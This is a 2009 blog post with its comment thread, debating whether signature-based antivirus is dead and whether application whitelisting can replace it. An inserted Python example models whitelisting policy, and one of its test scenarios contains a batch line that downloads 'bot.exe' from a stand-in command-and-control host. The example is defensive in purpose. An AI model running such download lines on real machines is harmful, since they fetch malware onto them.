Gartner’s lead analyst on endpoint protection, Peter Firstbrook, offered up a guest post on how major advances in desktop protection are badly needed. Peter and I had a bit of an email dialog, so we decided to include that dialog in the post:
Peter F: A recently published report from Trusteer (Measuring the in-the-wild effectiveness of Antivirus against Zeus) showed that 55% of 10,000 machines infected with the trojan Zeus had antivirus that was up-to-date. This is just another in a long line of reports that illustrate the increasing impotence of signature-based antivirus software, with the recent Cyveillance intelligence report and the Anti-virus comparative proactive/retrospective test being two others. Meanwhile even very security-conscious Gartner clients are increasingly reporting serious malware incidents.
It is clear that signature-based protection mechanisms, which depend on knowledge of a threat before they can protect the host, are dead. What other defensive security system allows virtually anything to happen unless it actually knows it is bad? Imagine a person picking mushrooms and eating anything they don’t know for certain is bad. They wouldn’t live very long, to say the least. Despite the evidence of antivirus ineffectiveness, very few alternatives are on the horizon. One solution we think has value is the whitelist approach (see “Application Control Market Update”). It would be significantly better for most organizations to lock endpoints from running anything that isn’t a known good application. Symantec’s recent Quorum announcement and McAfee’s acquisition of SolidCore are both about improving their ability to do this. Meanwhile vendors such as Bit9, Lumension, SignaCert and CoreTrace are busy attempting to lower the administrative overhead of whitelisting.
While it is still early days for this second generation of whitelisting solutions, it is clear that the blacklist is dying a death of a thousand (million?) cuts and something had better step into the breach soon. IT security buyers should give these upstarts some attention and put pressure on their incumbent blacklist provider to step up their efforts to solve this problem and stop attacking the symptoms.
John P: This seems aimed at AV-only at the desktop. Gartner has said that desktop protection is really “Endpoint Protection Platforms” these days, where the vendors have gone beyond just signature-based anti-viral and anti-spyware, and added host-based intrusion prevention and some levels of application control policies. Are you saying that those are signature-based AV only?
Also, I think the whitelisting part doesn’t address the fact that whitelisting is just as reactive as blacklisting. I can easily argue that in the JavaScript/ActiveX/AJAX/iPhone world good apps are growing just as fast as, and likely faster than, malware. Whitelisting is just a form of lockdown – consumerization is driving enterprises to have less control over the applications users run, not more. The “greylist” problem area is where the breakthroughs will have to happen.
Peter F: To the first point, yes, EPPs are better, but customers are not deploying the HIPS components because they are too noisy. The Zeus study could not say which AV products were installed, but most of the consumer solutions boast about their non-signature-based protection mechanisms.
True, whitelists are somewhat reactive. They have to wait for an app to be published before they can identify it in some cases. That is mitigated by cooperation between software developers and the whitelist caretakers, as opposed to the cat and mouse of the AV vendors and the attackers. But the real big difference between whitelisting and blacklisting is that the penalty for failure of a whitelist system is that you have to wait for a new application to get certified before it can run. That is less damaging than the penalty for failure of a blacklist which results in an infection and potentially a damaging security breach.
I agree that the Java/ActiveX apps in a browser are difficult to whitelist but that can be managed with a sandbox or policy restrictions on what these types of apps can do. Moreover Java/ActiveX are most often used to launch a more permanent presence on the client (i.e. the bot or keystroke logger), so the second stage would be stopped with a whitelist policy.
iPhone is actually an example of a “whitelist” system. Apple has to approve every app before it can be run. Although it is more restrictive for consumers and an extra step for application developers, it is good for consumers that these applications are pre-vetted for stability and security. The “malware pretending to be antivirus” scheme that is currently one of the more prolific threats on PCs and Macs would never work on an iPhone or a PC that is whitelisted. At the same time these applications easily evade behavioral-based HIPS because their behavior is exactly the same as other “good” applications.
So the bottom line is that EPP is better than vanilla AV but it still is not doing the job. We need something else and even with kinks whitelisting is the best hope we have right now. If not what else might fill the gap?
John P: Whitelists not only have to wait for the app to be published, they have to wait for IT to “bless” the app – again, consumerization is all about not waiting for IT. I agree that the “uber-whitelists” where all kinds of apps are quickly blessed as at least being “safe” provide much more flexibility than the old lockdown approach, but there will always be apps that users just have to use that aren’t on the white list or black list – application control capabilities are key there.
From a security perspective, the iPhone App Store isn’t really a whitelist. Apple certainly hasn’t shown publicly that any meaningful amount of actual security testing goes on as part of app certification. I think they are depending on the “the iPhone can only run one app at a time” excuse for why typical malware wouldn’t work, but it does leave it open to phishing-style apps in a big way. But I do agree – if users are happy living within the limitations of the App Store on the iPhone, there is a big opportunity to use this model on desktops to great security gain.
John Pescatore
9 responses so far
1 Vikram Phatak October 1, 2009 at 5:10 pm
In 2008, NSS Labs tested the effectiveness of Solidcore vs. viruses and found it to be very effective.
To clarify: the whitelist approach requires a “gold image” (OS + Applications) to start with, and registration of all subsequent applications & upgrades via user consent. Sounds good, right? But what if the user consents to install malware?
The Achilles’ heel of application whitelisting is not technical, but rather the end user. The fundamental problem with application whitelisting is that a large percentage of malware is of the socially engineered variety, meaning that users would likely “register” the virus as an acceptable program that they are trying to install.
Thus, NSS Labs believes whitelisting is an excellent solution for relatively static systems where acceptable applications are kept to a minimum, such as embedded devices like ATMs, and datacenter servers. But it is of limited use as a broader technology solution.
3 Ilya Rabinovich October 2, 2009 at 10:09 am
Hi John!
In fact, I strongly disagree. Especially with Peter F. Back on topic:
“A recently published report from Trusteer” – sorry, but I was developing a reverse sandbox solution and I can say loud and clear that those solutions just give a false feeling of security and nothing more.
“To the first point yes EPPs are better but customers are not deploying the HIPS components because they are too noisy” – really? Did you ever try a sandbox HIPS?
“iPhone is actually an example of a “whitelist” system” – that’s why many are using jailbreak to install software not approved by Apple.
“if users are happy living within the limitations of the App Store on the iPhone” – there is open-source and “truly” free software with this platform. Only “99c” ones. That’s the platform’s limitation. Is it suitable for PC? Yes, at the price of innovation and enthusiast developers.
Also, you’ve forgotten to mention interpreted file types like “.cmd”, “.ps1” or “.vbs”, because it’s practically impossible for them to be whitelisted.
In reality, whitelisting is very useful, but not as a standalone technique, rather as a supporting one. And this technology has very strong limitations – for example, much software infected by the Induc virus has been listed as “known as good” within whitelisting databases. Whitelisting is suitable not only with blacklisting-style protections, but with sandboxing-style HIPS (“graylist” problem solution) too.
4 Scott Olson October 2, 2009 at 10:34 am
As a user of a Mac with relatively little viable security options, I have to say that if I simply had a whitelisting solution that prevented unauthorized software from being loaded through an exploit I would be happy.
Vikram may be right when he points out that users may authorize installation of malware, but I would say that would be much less concerning to me than malware getting on my machine because I clicked on a shortened URL on a tweet. The most concerning exploitations today do not require user authorization to install the malicious code, they just require you to visit a site that exploits a browser vulnerability.
The problem of user-authorized installation of malware can be lessened through a change control process that takes into account the distributor of the application, whether the application was signed or not, etc. This is a far better problem than we have now, which is essentially NO protection whatsoever from blacklist anti-virus.
Looking at my Mac as a clean slate, I think it’s a good example of what should be done if we started over with desktop security. If I had a viable whitelist solution that was intelligent about handling application change, I wouldn’t bother with anti-virus.
5 Stiennon October 3, 2009 at 7:21 pm
Peter should not say “Signature based AV is Dead” unless it is OK to stop using it. I would not advise that.
I think Scott Olson above is on to the solution. Switch OSs. Start over. Build security into a version of Linux or BSD and start moving to applications that are supported on it. An expensive form of whitelisting but…
6 Rob Lewis October 3, 2009 at 8:30 pm
Richard,
For one that touts bolstering cyber defense, you seem reluctant to embrace technology that fortifies nodes on the grid so that they are no longer puncture points. What part of any OS, any application, do you not get?
You pick a version of Linux or BSD and you can use any applications you want. The beauty of Trustifier is that it can be used with what you are using right now; no need to “start over” and there may not be time to “start over”, if one listens to all those cyberwarfare spouting security pundits.
7 John Pescatore October 5, 2009 at 6:33 am
Had to do a bit of comment deletion, as don’t want to get too product specific on this blog.
8 Greg Valentine October 5, 2009 at 1:50 pm
First of all, fair notice (Red alert!). I work for CoreTrace; one of the vendors that is mentioned in the article.
I for one enjoyed this posting a great deal. The main reason is that I believe that Peter and John are both on the right trail. It seems that everyone is in agreement with Peter in saying that traditional blacklisting technology is on its last legs. The real question is what will become the new foundation for endpoint security? Completely agree with Peter here.
I also agree with John when he says that application whitelisting can be as reactive as blacklisting if the mega-whitelist approach is taken. It is arguably as large of a problem (if not a larger problem) to keep track of all the ‘good’ binaries out there in the world vs all of the malware out there.
CoreTrace looks at the problem from a different angle. BOUNCER (the CoreTrace application) creates and maintains a whitelist for each individual endpoint and protects each computer against its own unique ‘baseline’ whitelist. This unique way of looking at the problem not only protects all computers from new malware trying to run (just like any other whitelisting product) but also provides for some nice configuration control capabilities. There are any number of legitimate applications in the world which are most definitely not malware; however, the organization may not consider those applications authorized to run on their systems. With BOUNCER installed, unauthorized applications would also be prevented just as easily as new malware.
I agree with John again when he mentioned the fact that whitelisting can actually add more work for IT. To have to wait to receive a blessing from the IT group before adding new applications or updates to the whitelist would be a significant problem for any organization. This would inevitably lead to a huge frustration point for both the IT department as well as the various end users.
To resolve this ‘challenge’, CoreTrace added the ability to define various ‘sources of trust’. Basically this means that if a new application or change is originating from one of these sources of trust then it would be allowed to occur AND the new binaries from the installation package will automatically be added to the whitelist. Network shares, applications, users, digital signatures and system updaters are all various forms of trusted change. The philosophy of BOUNCER is to cooperate with an organization’s normal business process regarding change. For example, if a company uses a system management application (such as SCCM) to push out new applications, then BOUNCER can be configured to allow that to take place. The IT group does not need to do anything different to push out a new update or application to their infrastructure. The same example can be applied to a new ActiveX component (BOUNCER uses the digital signature of the ActiveX component to determine if it should be allowed to execute or not).
In the end, it is truly exciting to see these types of discussions taking place in an open forum. Please keep up the good work!
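The post and the comments above argue about application whitelisting at the level of policy: a per-host baseline of known-good binaries, "trusted change" sources (an updater, a signed package) that extend that baseline without an IT ticket, and the two failure modes the commenters raise, a user consenting to install something malicious and script files run through an already-whitelisted interpreter. The toy policy engine below, added here as an example and not code from the post, from Gartner or from any vendor named in the thread, makes those decisions concrete. File contents, hashes, paths, publisher names and origin labels are all constructed; a real product hashes the on-disk binary and verifies the code signature rather than taking a string on trust.

```python
"""Toy application-control policy engine (added example; all inputs constructed)."""
import hashlib
from dataclasses import dataclass, field
from typing import Optional, Tuple


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


@dataclass
class ExecRequest:
    path: str                        # program being launched
    content: bytes                   # bytes of that program (constructed stand-ins)
    publisher: Optional[str] = None  # verified code-signing identity, None if unsigned
    origin: str = "user"             # what placed the file: "user", "sccm", "os-updater"
    user_consented: bool = False     # user clicked "allow" on an install prompt
    script: Optional[bytes] = None   # script handed to an interpreter, if any


@dataclass
class Policy:
    allowlist: set = field(default_factory=set)           # sha256 of approved binaries
    trusted_publishers: set = field(default_factory=set)  # signers whose output is admitted
    trusted_origins: set = field(default_factory=set)     # deployment channels that are admitted
    honour_user_consent: bool = False   # the social-engineering hole Vikram describes
    interpreters: set = field(default_factory=set)        # basenames such as "cmd.exe"
    check_scripts: bool = False         # hash the script as well as the interpreter

    def decide(self, req: ExecRequest) -> Tuple[str, str]:
        """Return (verdict, reason). Trusted change has the side effect of
        adding the new binary's hash to the allowlist, which is the point:
        the baseline grows without an IT approval step."""
        verdict = self._decide_binary(req, sha256_hex(req.content))
        if verdict[0] != "allow":
            return verdict
        name = req.path.rsplit("/", 1)[-1].lower()
        if name in self.interpreters and req.script is not None:
            # The interpreter is on the allowlist; the script it runs is not
            # a binary, so a naive whitelist never looks at it (Ilya's point).
            if not self.check_scripts:
                return "allow", "interpreter-allowlisted-script-unchecked"
            if sha256_hex(req.script) not in self.allowlist:
                return "deny", "script-not-allowlisted"
            return "allow", "script-allowlisted"
        return verdict

    def _decide_binary(self, req: ExecRequest, h: str) -> Tuple[str, str]:
        if h in self.allowlist:
            return "allow", "baseline"
        if req.publisher and req.publisher in self.trusted_publishers:
            self.allowlist.add(h)
            return "allow", "trusted-publisher"
        if req.origin in self.trusted_origins:
            self.allowlist.add(h)
            return "allow", "trusted-origin"
        if self.honour_user_consent and req.user_consented:
            self.allowlist.add(h)
            return "allow", "user-consent"
        # Penalty for a whitelist miss: the program waits for approval.
        return "deny", "not-on-allowlist"


# Constructed "gold image": path -> stand-in bytes for the installed binary.
GOLD_IMAGE = {
    "C:/Windows/System32/cmd.exe": b"cmd-binary",
    "C:/Program Files/Office/winword.exe": b"word-binary",
}


def baseline_policy(check_scripts: bool = False, honour_user_consent: bool = False) -> Policy:
    return Policy(
        allowlist={sha256_hex(b) for b in GOLD_IMAGE.values()},
        trusted_publishers={"CN=Example Software Vendor"},   # constructed signer name
        trusted_origins={"sccm", "os-updater"},              # constructed channel labels
        honour_user_consent=honour_user_consent,
        interpreters={"cmd.exe", "powershell.exe", "wscript.exe"},
        check_scripts=check_scripts,
    )


def run_scenarios(policy: Policy) -> dict:
    """Five constructed launch requests, keyed by path, with the policy's verdict."""
    requests = [
        ExecRequest("C:/Program Files/Office/winword.exe", b"word-binary"),
        # fake-antivirus downloaded by the user, who clicks "allow"
        ExecRequest("C:/Temp/AntivirusPro2009.exe", b"fake-av", user_consented=True),
        # patch pushed by the systems-management channel
        ExecRequest("C:/Windows/Temp/patch.exe", b"patch-v2", origin="sccm"),
        # unsolicited but signed by a trusted publisher
        ExecRequest("C:/Temp/update.exe", b"vendor-update", publisher="CN=Example Software Vendor"),
        # allowlisted interpreter running an unknown batch script
        ExecRequest("C:/Windows/System32/cmd.exe", b"cmd-binary",
                    script=b"@echo off\r\ncurl http://c2.example/bot.exe\r\n"),
    ]
    return {r.path: policy.decide(r) for r in requests}


if __name__ == "__main__":
    for path, verdict in run_scenarios(baseline_policy()).items():
        print(f"{verdict[0]:5} {verdict[1]:40} {path}")
```

Run as written, the fake antivirus is denied and the SCCM patch and signed update are admitted and added to the allowlist. Flip `honour_user_consent=True` and the fake antivirus is admitted on the user's click, which is the case Vikram raises; leave `check_scripts=False` and the batch script sails through on the strength of `cmd.exe` being on the baseline, which is the case Ilya raises. Both switches show why the comments treat whitelisting as a strong control for static systems and a supporting one elsewhere.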
9 Application whitelisting and the importance of trusted change — CoreTrace WhiteSpace October 21, 2009 at 3:04 pm
[...] For the purpose of this post, I will make the assumption that most IT professionals are dissatisfied with their current endpoint security, are looking for alternatives, and that application whitelisting is on the short list of possibilities. This is certainly the case at Gartner Group if you look at their recent postings like this one. [...]